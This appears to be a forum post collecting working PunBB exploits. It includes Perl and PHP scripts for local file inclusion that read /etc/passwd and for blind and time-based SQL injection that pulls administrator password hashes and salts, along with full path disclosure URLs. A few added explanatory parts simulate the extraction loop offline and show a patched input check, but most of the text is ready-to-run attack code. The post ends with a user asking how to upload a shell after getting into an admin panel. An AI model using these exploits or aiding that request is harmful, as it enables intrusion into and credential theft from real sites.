            $write .= "Host: $host[0]\r\n";
            $write .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n";
            $write .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
            $write .= "Accept-Language: en-us,en;q=0.5\r\n";
            $write .= "Connection: close\r\n\r\n";

            $response = $this->http_request($host[0], $write);
            if (stristr($response, 'No such file or directory in')) {
                continue;
            }
            if ($mode == "save") {
                $rand = rand(0, 99999);
                file_put_contents(getcwd().'/'.$rand.'.txt', $response, FILE_APPEND);
                echo "[+] File $rand Saved Successfully!\r\n";
                echo "[+] Exploit Terminated!\r\n";
            } else {
                echo $response;
            }
            exit;
        }
        echo "[+] Exploit Failed!\r\n";
    }
}
PHP:
#!/usr/bin/perl
=about

PunBB (PunPortal 0.1) Local File Inclusion Exploit
--------------------------------------------------
by athos - staker[at]hotmail[dot]it
download mod http://www.punres.org/download.php?id=1108
download cms http://punbb.org

register globals = 1
magic quotes gpc = 1

File (include/login.php)

1.  <?php
2.
3.  // Show login if not logged in
4.  if($pun_user['is_guest'])
5.  {
6.      if(!isset($focus_element) || (isset($focus_element) && !in_array('login', $focus_element)))
7.      {
8.
9.          // Load the language files
10.         require PUN_ROOT.'lang/'.$pun_user['language'].'/common.php';
11.         require PUN_ROOT.'lang/'.$pun_user['language'].'/login.php';

$pun_user['is_guest'] isn't declared
$pun_user['language'] isn't declared

include/user/login.php?pun_user[is_guest]=a&pun_user[language]=../../etc/passwd%00

how to fix? use the latest version (2.0)

Usage: perl punbb.pl localhost/cms

=cut

use strict;
use warnings;
use IO::Socket;

my $html = '';
my $site = $ARGV[0] or &help;
my @take = split /\//, $site;
my ($host, $path) = @take;

if ($site =~ /http:\/\/(.+?)/i) {
    print STDOUT "Invalid URL\n";
    exit;
}

print STDOUT "Local File (ex: ../../etc/passwd)\n";
print STDOUT "Local File: ";
chomp(my $file = <STDIN>);

if (not defined($file)) {
    print STDOUT "File Not Defined!\n";
    exit;
}

# both array keys come from the query string under register_globals; %00 ends the path
my $evil = "/include/user/login.php?pun_user[is_guest]=a&pun_user[language]=";

my $sock = new IO::Socket::INET(
    PeerAddr => $host,
    PeerPort => 80,
    Proto    => 'tcp',
    Timeout  => 6,
) or die $!;

# no Accept-Encoding: a gzip reply could not be saved as text from the raw socket
my $data = "GET /${path}/${evil}${file}%00 HTTP/1.1\r\n".
           "Host: $host\r\n".
           "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n".
           "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n".
           "Accept-Language: en-us,en;q=0.5\r\n".
           "Connection: close\r\n\r\n";

$sock->send($data);

while (<$sock>) {
    $html .= $_;
}

if ($html =~ /(No such file or directory|HTTP\/1.1 404 Not Found)/i) {
    print STDOUT "Exploit Failed!\n";
    exit;
} else {
    my $name = int(rand(999)).'.txt';
    open(FILE, ">", $name) or die $!;
    print FILE $html;
    close(FILE);
    print STDOUT "Exploit Successfully!\n";
    print STDOUT "$name saved!\n";
    exit;
}

sub help {
    print STDOUT "PunBB (PunPortal 0.1) Local File Inclusion Exploit\n".
                 "by athos - staker[at]hotmail[dot]it\n".
                 "Usage: perl $0 [host/path]\n";
    exit;
}

http://www.milw0rm.com/exploits/7168
PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit
Code:
#!/usr/bin/perl
#[0-Day] PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit
#Coded By Dante90, WaRWolFz Crew
#Bug Discovered By: Dante90, WaRWolFz Crew

use strict;
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
use Time::HiRes;
use IO::Socket;

my ($UserName, $PassWord, $ID) = @ARGV;
if (@ARGV < 3) {
    &usage();
    exit();
}

my $Message = "";
my $Hash = "";
my ($Time, $Time_Start, $Time_End, $Response);
my ($Start, $End);
# ASCII codes of 0-9 and a-f: the alphabet of a hex password hash
my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
my $Host = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link
my $Method = HTTP::Request->new(POST => $Host);
my $Cookies = new HTTP::Cookies;
my $HTTP = new LWP::UserAgent(
    agent        => 'Mozilla/5.0',
    max_redirect => 0,
    cookie_jar   => $Cookies,
) or die $!;
my $Referrer = "form_sent=1&pid=10174&poster=Dante90, WaRWolFz Crew&method=1&req_message=http://www.warwolfz.com/&submit=Invia";
my $DefaultTime = request($Referrer);

sub Login {
    my $Login = $HTTP->post($Host.'login.php?action=in', [
        form_sent    => '1',
        redirect_url => 'forums.php',
        req_username => $UserName,
        req_password => $PassWord,
        login        => 'Login',
    ]) || die $!;
    if ($Login->content =~ /Logged in successfully./i) {
        return 1;
    } else {
        return 0;
    }
}

if (Login() == 1) {
    $Message = " * Logged in as: ".$UserName;
} else {
    $Message = " * Login Failed.";
    refresh($Message, $Host, $DefaultTime, "0", $Hash, $Time, "1");
    print " * Exploit Failed *\n";
    print " ------------------------------------------------------ \n";
    exit;
}

# condition is true only when character $dec of the target's password hash has ASCII code $hex
sub Blind_SQL_Injection {
    my ($dec, $hex) = @_;
    return "Dante90, WaRWolFz Crew\" OR ASCII(SUBSTRING((SELECT `password` FROM `users` WHERE `id`=${ID}),${dec},1))=${hex}/*";
}

for (my $I = 1; $I <= 40; $I++) {        #N Hash characters
    for (my $J = 0; $J <= 15; $J++) {    #0 -> F
        my $Post = $HTTP->post($Host.'reputation.php?', [
            form_sent   => '1',
            pid         => '2',
            poster      => Blind_SQL_Injection($I, $chars[$J]),
            method      => '1',
            req_message => 'http://www.warwolfz.com/',
            submit      => 'Submit',
        ]) || die $!;
        $Time = request($Referrer);
        refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
        # the success page only appears when the injected condition is true
        if ($Post->content =~ /(The reputation has been successfully changed)/i) {
            syswrite(STDOUT, chr($chars[$J]));
            $Hash .= chr($chars[$J]);
            $Time = request($Referrer);
            refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
            last;
        }
    }
    if ($I == 1 && length $Hash < 1 && !$Hash) {
        print " * Exploit Failed *\n";
        print " ------------------------------------------------------ \n";
        exit;
    }
    if ($I == 40) {
        print " * Exploit Successed *\n";
        print " ------------------------------------------------------\n ";
        system("pause");
    }
}

sub usage {
    system("cls");
    {
        print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit\n";
        print " ------------------------------------------------------ \n";
        print " * USAGE:                                               *\n";
        print " * cd [Local Disk]:\\[Directory Of Exploit]\\              *\n";
        print " * perl name_exploit.pl [username] [password] [id]       *\n";
        print " ------------------------------------------------------ \n";
        print " * Powered By Dante90, WaRWolFz Crew                    *\n";
        print " * www.warwolfz.org - dante90_founder[at]warwolfz.org   *\n";
        print " ------------------------------------------------------ \n";
    };
    exit;
}

sub request {
    $Referrer = $_[0];
    $Method->content_type('application/x-www-form-urlencoded');
    $Method->content($Referrer);
    $Start = Time::HiRes::time();
    $Response = $HTTP->request($Method);
    $Response->is_success() or die "$Host : ", $Response->message, "\n";
    $End = Time::HiRes::time();
    $Time = $End - $Start;
    return $Time;
}

sub refresh {
    system("cls");
    {
        print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit\n";
        print " ------------------------------------------------------ \n";
        print " * USAGE:                                               *\n";
        print " * cd [Local Disk]:\\[Directory Of Exploit]\\              *\n";
        print " * perl name_exploit.pl [username] [password] [id]       *\n";
        print " ------------------------------------------------------ \n";
        print " * Powered By Dante90, WaRWolFz Crew                    *\n";
        print " * www.warwolfz.org - dante90_founder[at]warwolfz.org   *\n";
        print " ------------------------------------------------------ \n";
    };
    print $_[0] ."\n";
    print " * Victime Site: " . $_[1] . "\n";
    print " * Default Time: " . $_[2] . " seconds\n";
    print " * BruteForcing Hash: " . chr($chars[$_[3]]) . "\n";
    print " * BruteForcing N Char Hash: " . $_[6] . "\n";
    print " * SQL Time: " . $_[5] . " seconds\n";
    print " * Hash: " . $_[4] . "\n";
}

#WaRWolFz Crew
# milw0rm.com [2009-07-28]
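As an added example (not the exploit's own code, and nothing here touches a network): the character-by-character extraction loop the Perl script performs, with the same injected condition, run against a constructed stand-in for the vulnerable reputation.php so the logic can be checked offline. FAKE_USERS, fake_oracle and the sha1 of "password" for user id 2 are assumptions made for the demo; the real oracle is the HTTP POST whose response contains "The reputation has been successfully changed".

```python
import hashlib
import re

HEX_CHARS = "0123456789abcdef"   # the 16 ASCII codes in the exploit's @chars array


def make_payload(pos: int, code: int, user_id: int = 2) -> str:
    """The boolean condition the exploit injects through the `poster` field (same
    shape as its Blind_SQL_Injection sub): true only if character `pos` of the
    target's password hash has ASCII code `code`."""
    return ('Dante90, WaRWolFz Crew" OR ASCII(SUBSTRING((SELECT `password` FROM `users` '
            'WHERE `id`=%d),%d,1))=%d/*' % (user_id, pos, code))


def probe(oracle, user_id: int = 2) -> bool:
    """Does any hex character match at position 1? Same check as the exploit's
    'Exploit Failed' after the first position, but done up front."""
    return any(oracle(make_payload(1, ord(ch), user_id)) for ch in HEX_CHARS)


def extract_hash(oracle, hash_len: int = 40, user_id: int = 2) -> str:
    """Recover the hash one character at a time. `oracle(payload)` must return True
    when the application answers with its success page. Worst case hash_len * 16
    requests (40 * 16 = 640 for a sha1 hash)."""
    recovered = ""
    for pos in range(1, hash_len + 1):
        for ch in HEX_CHARS:
            if oracle(make_payload(pos, ord(ch), user_id)):
                recovered += ch
                break
        else:
            # nothing matched: the injection does not fire, or the hash is shorter
            raise RuntimeError("no character matched at position %d" % pos)
    return recovered


# ---- constructed stand-in for the vulnerable forum (assumption, not a real target) ----
FAKE_USERS = {2: hashlib.sha1(b"password").hexdigest()}   # admin id 2, sha1 as PunBB stores it
_COND = re.compile(r"WHERE `id`=(\d+)\),(\d+),1\)\)=(\d+)/\*$")


def fake_oracle(payload: str) -> bool:
    """Evaluate the injected condition the way MySQL would, on FAKE_USERS."""
    m = _COND.search(payload)
    if not m:
        return False
    uid, pos, code = (int(x) for x in m.groups())
    pw = FAKE_USERS.get(uid, "")
    # SUBSTRING past the end yields '' and ASCII('') is 0, so no hex code matches
    return 1 <= pos <= len(pw) and ord(pw[pos - 1]) == code


if __name__ == "__main__":
    calls = 0

    def counting_oracle(p):
        global calls
        calls += 1
        return fake_oracle(p)

    got = extract_hash(counting_oracle)
    print("recovered:", got, "correct:", got == FAKE_USERS[2], "requests:", calls)
```

The request count is what makes blind extraction noisy: every position costs up to 16 POSTs to reputation.php, each of which the script above also pads with a timing request, so a 40-character hash leaves several hundred near-identical requests in the web log.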
PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit
Code:
#!/usr/bin/perl
#[0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit
#Coded By Dante90, WaRWolFz Crew
#Bug Discovered By: Dante90, WaRWolFz Crew
#register_globals = On
#magic_quotes_gpc = On
use LWP::UserAgent;
use HTTP::Cookies;
use strict;

my $EtcPasswd;
my $TransversalDirectory = "./../../../../"; #Transversal Directory
my $LFI = "etc/passwd"; #File Inject
my $HostName = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link
my $Referrer = "http://www.warwolfz.com/";
my $Cookies = new HTTP::Cookies;
my $UserAgent = new LWP::UserAgent(
    agent => 'Mozilla/5.0',
    max_redirect => 0,
    cookie_jar => $Cookies,
) or die $!;

sub Local_File_Inclusion{
    my ($Directory,$Command) = @_;
    return "./include/reputation/rep_profile.php?pun_user[language]=${Directory}${Command}%00";
}

my $Get = $UserAgent->get($HostName.Local_File_Inclusion($TransversalDirectory,$LFI));
if ($Get->content =~ /No such file or directory in/i){
    refresh($HostName, "Exploit Filed");
    print " * Error extracting sensible data.\n";
    print " * Exploit Failed *\n";
    print " ------------------------------------------------------ \n\n";
}else{
    $EtcPasswd = $Get->content;
    open ( FILE , ">WaRWolFz.html" ) or die $!;
    print FILE $EtcPasswd;
    close ( FILE );
    refresh($HostName, "File Saved");
    print " * Exploit Successed *\n";
    print " ------------------------------------------------------\n\n";
    system("pause");
}

sub usage{
    system("cls");
    {
        print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit\n";
        print " ------------------------------------------------------ \n";
        print " * USAGE: *\n";
        print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";
        print " * perl name_exploit.pl *\n";
        print " ------------------------------------------------------ \n";
        print " * Powered By Dante90, WaRWolFz Crew *\n";
        print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
        print " ------------------------------------------------------ \n";
    };
    exit;
}

sub refresh{
    system("cls");
    {
        print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit\n";
        print " ------------------------------------------------------ \n";
        print " * USAGE: *\n";
        print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";
        print " * perl name_exploit.pl *\n";
        print " ------------------------------------------------------ \n";
        print " * Powered By Dante90, WaRWolFz Crew *\n";
        print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
        print " ------------------------------------------------------ \n";
    };
    print " * Victime Site: " . $_[0] . "\n";
    print " * Etc/Passwd: " . $_[1] . "\n";
}
#WaRWolFz
# milw0rm.com [2009-07-30]
Punbb Extension Attachment <= v1.0.2 Bind SQL injection exploit
Code:
if (isset($_GET['secure_str']))
{
    if (preg_match('~(\d+)f(\d+)~', $_GET['secure_str'], $match))
    {
        ...
        'WHERE' => 'a.id = '.$attach_item.' AND (fp.read_forum IS NULL OR fp.read_forum = 1)

Abuse of preg_match (the pattern is not anchored, so the check passes for any string that merely contains a digits-f-digits substring).
Code:
#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
Punbb Extension Attachment <= v1.0.2 Bind SQL injection exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by PunBB"
+---------------------------------------------------------------------------+
');
/**
 * works regardless of php.ini settings
 */
if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to punbb
Example: php '.$argv[0].' localhost /punbb/
+---------------------------------------------------------------------------+
');
    exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$pre = 'pun_';
$benchmark = 200000000;
$timeout = 10;
echo "Plz Waiting...\nPassword:\n";
/**
 * get pass
 */
$j = 1;
$pass = '';
$hash[0] = 0; //null
$hash = array_merge($hash, range(48, 57)); //numbers
$hash = array_merge($hash, range(97, 122)); //az letters
while (strlen($pass) < 40) {
    for ($i = 0; $i <= 255; $i ++) {
        if (in_array($i, $hash)) {
            $cmd = '1f1%27%20AND%20(IF((ASCII(SUBSTRING((SELECT%20password%20FROM%20'.$pre.'users%20WHERE%20group_id=1%20LIMIT%201),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))%23';
            send();
            usleep(2000000);
            $starttime = time();
            send();
            $endtime = time();
            $difftime = $endtime - $starttime;
            if ($difftime > $timeout) {
                $pass .= chr($i);
                echo chr($i);
                break;
            }
        }
        if ($i == 255) exit("\nExploit Failed!\n");
    }
    $j ++;
}
echo "\nSalt:\n";
/**
 * get salt
 */
$j = 1;
$salt = '';
$hash[0] = 0; //null
$hash = array_merge($hash, range(33, 126));
while (strlen($salt) < 12) {
    for ($i = 0; $i <= 255; $i ++) {
        if (in_array($i, $hash)) {
            $cmd = '1f1%27%20AND%20(IF((ASCII(SUBSTRING((SELECT%20salt%20FROM%20'.$pre.'users%20WHERE%20group_id=1%20LIMIT%201),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))%23';
            send();
            usleep(2000000);
            $starttime = time();
            send();
            $endtime = time();
            $difftime = $endtime - $starttime;
            if ($difftime > $timeout) {
                $salt .= chr($i);
                echo chr($i);
                break;
            }
        }
        if ($i == 255) exit("\nExploit Failed!\n");
    }
    $j ++;
}
exit("\nExpoilt Success!\nPassword Hash:\t$pass\nSalt:\t$salt\n");

function send() {
    global $host, $path, $cmd;
    $data = "GET ".$path."misc.php?item=1&secure_str=".$cmd." HTTP/1.1\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Connection: Close\r\n\r\n";
    $fp = fsockopen($host, 80);
    fputs($fp, $data);
    $resp = '';
    while ($fp && !feof($fp)) $resp .= fread($fp, 1024);
    return $resp;
}
?>
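The defect behind this one is the unanchored `~(\d+)f(\d+)~`: the match succeeds on any string containing digits-f-digits, and the untouched `secure_str` then reaches the query. The following is an added example, not the Attachment extension's own code (function and field names are assumptions); it puts that check next to a hardened version that anchors the whole string and only ever uses the integer captures. The same cast-to-int rule is what fixes the later Pun_PM excerpt, where `escape()` is applied to an unquoted numeric `message_id`.

```php
<?php
// Added example; not from the Attachment extension. Names are illustrative.

// Vulnerable shape: the regex is unanchored and the raw string is used afterwards.
function secure_str_unsafe($secure_str)
{
    if (!preg_match('~(\d+)f(\d+)~', $secure_str, $match)) {
        return null;            // rejected
    }
    return $secure_str;         // bug: accepted, but returns the untouched input
}

// Hardened: anchor both ends (D = "$" matches only at the very end, not before a
// trailing newline), require a string, and use only the numeric captures.
function secure_str_safe($secure_str)
{
    if (!is_string($secure_str) || !preg_match('~^(\d+)f(\d+)$~D', $secure_str, $match)) {
        return null;
    }
    return array(
        'item' => (int) $match[1],   // safe to concatenate into "a.id = " . $item
        'file' => (int) $match[2],   // second field; name assumed
    );
}

// Constructed inputs: a legitimate value, a payload shaped like the one above,
// and a value with a trailing newline that an un-D'd "$" would still accept.
$inputs = array("1f1", "1f1' AND 1=1#", "1f1\n");
foreach ($inputs as $in) {
    printf(
        "%-18s unsafe=%-16s safe=%s\n",
        json_encode($in),
        var_export(secure_str_unsafe($in), true),
        json_encode(secure_str_safe($in))
    );
}
```

Run with `php example.php`: the unsafe check accepts all three inputs unchanged, while the hardened one accepts only `1f1` and returns `{"item":1,"file":1}`.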
There is a blind injection in this one as well.
=================================================================
PunBB <= 1.3.4 Pun_PM <= v1.2.6 Blind SQL Injection Vulnerability
=================================================================
PHP:
#!/usr/bin/perl
# [0-Day] PunBB <= 1.3.* Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit
# Author/s: Dante90, WaRWolFz Crew
# Created: 2009.07.30 after 0 days the bug was discovered.
# Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770, Shades Master, The:Paradox, V1R5, yeat
# Greetings To: _ nEmO _, XaDoS, Necrofiend, Lutor, vagabondo, hacku, yawn, The_Exploited, Shotokan-The Hacker, _mRkZ_,
# Chuzz, init, plucky, SaRtE, Lupo
# Thanks For Testing: BlAcK HaT, l3d
# Web Site: www.warwolfz.org
# My Wagend (Dante90): dante90wwz.altervista.org
# Unit-X Project: www.unitx.net
# ----
# Why I've decided to publish this?
# Because in "Package: Pun_PM <= v1.2.9" the bug was fixed.
# ----
# DETAILS
# ./PunBB v1.3.*/extensions/pun_pm/functions.php
# LINES: 504 -> 526
# function pun_pm_edit_message()
# {
#     global $forum_db, $forum_user, $lang_pun_pm;
#
#     $errors = array();
#
#     // Verify input data
#     $query = array(
#         'SELECT' => 'm.id as id, m.sender_id as sender_id, m.status as status, u.username as username, m.subject as subject, m.body as body',
#         'FROM' => 'pun_pm_messages m',
#         'JOINS' => array(
#             array(
#                 'LEFT JOIN' => 'users AS u',
#                 'ON' => '(u.id = m.receiver_id)'
#             ),
#         ),
#         'WHERE' => 'm.id = '.$forum_db->escape($_GET['message_id']).' AND m.sender_id = '.$forum_user['id'].' AND m.deleted_by_sender = 0'
#     );
#
#     ($hook = get_hook('pun_pm_fn_edit_message_pre_validate_query')) ? eval($hook) : null;
#
#     $result = $forum_db->query_build($query) or error(__FILE__, __LINE__);
# ----
# GET http://127.0.0.1/WaRWolFz/misc.php?section=pun_pm&pmpage=write&message_id=-1'
# Error - PunBB
# An error was encountered
# The error occurred on line 525 in ./WaRWolFz/extensions/pun_pm/functions.php
# Database reported: Errore di sintassi nella query SQL vicino a '\ AND m.sender_id = 2 AND m.deleted_by_sender = 0' linea 1 (Errno: 1064).

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
use Time::HiRes;
use IO::Socket;

my ($UserName,$PassWord,$ID) = @ARGV;
if (@ARGV < 3) {
    &usage();
    exit();
}
my $Message = "";
my $Hash = "";
my ($Time,$Time_Start,$Time_End,$Response);
my ($Start,$End);
my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
my $Host = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link
my $Method = HTTP::Request->new(GET => $Host);
my $Cookies = new HTTP::Cookies;
my $HTTP = new LWP::UserAgent(
    agent => 'Mozilla/5.0',
    max_redirect => 0,
    cookie_jar => $Cookies,
) or die $!;
my $Referrer = "http://www.warwolfz.org/";
my $DefaultTime = request($Referrer);

sub request {
    $Referrer = $_[0];
    $Method->referrer($Referrer);
    $Start = Time::HiRes::time();
    $Response = $HTTP->request($Method);
    $Response->is_success() or die "$Host : ", $Response->message,"\n";
    $End = Time::HiRes::time();
    $Time = $End - $Start;
    return $Time;
}

sub Blind_SQL_Jnjection {
    my ($dec,$hex) = @_;
    return "./misc.php?section=pun_pm&pmpage=write&message_id=-1 OR 1!=(SELECT IF((ASCII(SUBSTRING(`password`,${dec},1))=${hex}),benchmark(200000000,CHAR(0)),0) FROM `users` WHERE `id`=${ID})--";
}

sub Clear() {
    my $launch = $^O eq 'MSWin32' ? 'cls' : 'clear';
    return system($launch);
}

sub Login() {
    if ($ARGV[4] =~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}?$/) {
        $Cookies->proxy(['http', 'ftp'], 'http://'.$ARGV[4]) or die $!;
    }
    my $Get = $HTTP->get($Host.'login.php');
    my $csrf_token = "";
    if ($Get->content =~ /type="hidden" name="csrf_token" value="([a-f0-9]{1,40})/i) { #ByPassing csrf_token hidden input
        $csrf_token = $1;
    }
    my $Login = $HTTP->post($Host.'login.php', [
        form_sent => '1',
        redirect_url => $Host.'login.php',
        csrf_token => $csrf_token,
        req_username => $UserName,
        req_password => $PassWord,
        save_pass => '1',
        login => 'Login',
    ]) || die $!;
    if ($Login->content =~ /Verrai trasferito automaticamente ad una nuova pagina in 1 secondo/i) { #English Language: You should automatically be forwarded to a new page in 1 second.
        return 1;
    } else {
        return 0;
    }
}

sub usage {
    Clear();
    {
        print " \n [0-Day] PunBB <= 1.3.4 Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit\n";
        print " ------------------------------------------------------ \n";
        print " * USAGE: *\n";
        print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";
        print " * perl name_exploit.pl [username] [password] [id] *\n";
        print " * [proxy] is optional (ex: 151.57.4.97:8080) *\n";
        print " ------------------------------------------------------ \n";
        print " * Powered By Dante90, WaRWolFz Crew *\n";
        print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
        print " ------------------------------------------------------ \n";
    };
    exit;
}

sub refresh {
    Clear();
    {
        print " \n [0-Day] PunBB <= 1.3.4 Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit\n";
        print " ------------------------------------------------------ \n";
        print " * USAGE: *\n";
        print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";
        print " * perl name_exploit.pl [username] [password] [id] *\n";
        print " * [proxy] is optional (ex: 151.57.4.97:8080) *\n";
        print " ------------------------------------------------------ \n";
        print " * Powered By Dante90, WaRWolFz Crew *\n";
        print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
        print " ------------------------------------------------------ \n";
    };
    print $_[0] ."\n";
    print " * Victime Site: " . $_[1] . "\n";
    print " * Default Time: " . $_[2] . " seconds\n";
    print " * BruteForcing Hash: " . chr($chars[$_[3]]) . "\n";
    print " * BruteForcing N Char Hash: " . $_[6] . "\n";
    print " * SQL Time: " . $_[5] . " seconds\n";
    print " * Hash: " . $_[4] . "\n";
}

sub Main(){
    if (Login() == 1) {
        $Message = " * Logged in as: ".$UserName;
    } elsif (Login() == 0) {
        $Message = " * Login Failed.";
        refresh($Message, $Host, $DefaultTime, "0", $Hash, $Time, "1");
        print " * Exploit Failed *\n";
        print " ------------------------------------------------------ \n";
        exit;
    }
    for (my $I=1; $I<=40; $I++) { #N Hash characters
        for (my $J=0; $J<=15; $J++) { #0 -> F
            $Time_Start = time();
            my $Get1 = $HTTP->get($Host.Blind_SQL_Jnjection($I,$chars[$J]));
            $Time_End = time();
            $Time = request($Referrer);
            refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
            if ($Time_End - $Time_Start > 6) {
                $Time = request($Referrer);
                refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
                if ($Time_End - $Time_Start > 6) {
                    syswrite(STDOUT,chr($chars[$J]));
                    $Hash .= chr($chars[$J]);
                    $Time = request($Referrer);
                    refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
                    last;
                }
            }
        }
        if ($I == 1 && length $Hash < 1 && !$Hash) {
            print " * Exploit Failed *\n";
            print " ------------------------------------------------------ \n";
            exit;
        }
        if ($I == 40) {
            print " * Exploit Successfully Executed *\n";
            print " ------------------------------------------------------\n ";
            system("pause");
        }
    }
}
Main();
#WaRWolFz Crew
# Inj3ct0r.com [2010-07-27]

===========================================================
PunBB Automatic Image Upload 1.0 Shell Upload Vulnerability
===========================================================
Code:
# Exploit Title: Punbb 1.3.4 Full Path Disclosure
# Date: 07/11/2010
# Author: SYSTEM_OVERIDE, OverSecurityCrew
# Software Link: http://punbb.informer.com/
# Vulnerability Type: Full Path Disclosure
# Version: 1.3.4

An attacker can discover the ROOTPATH. Vulnerable files:
Code:
/search.php
/userlist.php
moderate.php

Example:
Code:
http://www.site.com/[path]/search.php?action=search&keywords[]=&author[]=&search_in=all&sort_by=0&SORT_DAshow_as=DESC&topics=&search=Submit+search
http://www.site.com/[path]/userlist.php?username[]=&show_group=-1&sort_by=username&sort_dir=ASC&search=Avvia+ricerca
http://www.site.com/[path]/moderate.php?get_host[]=
Log into the admin panel; it states clearly which version it is. I've logged in, but I can't work out what to do next, how to upload a shell.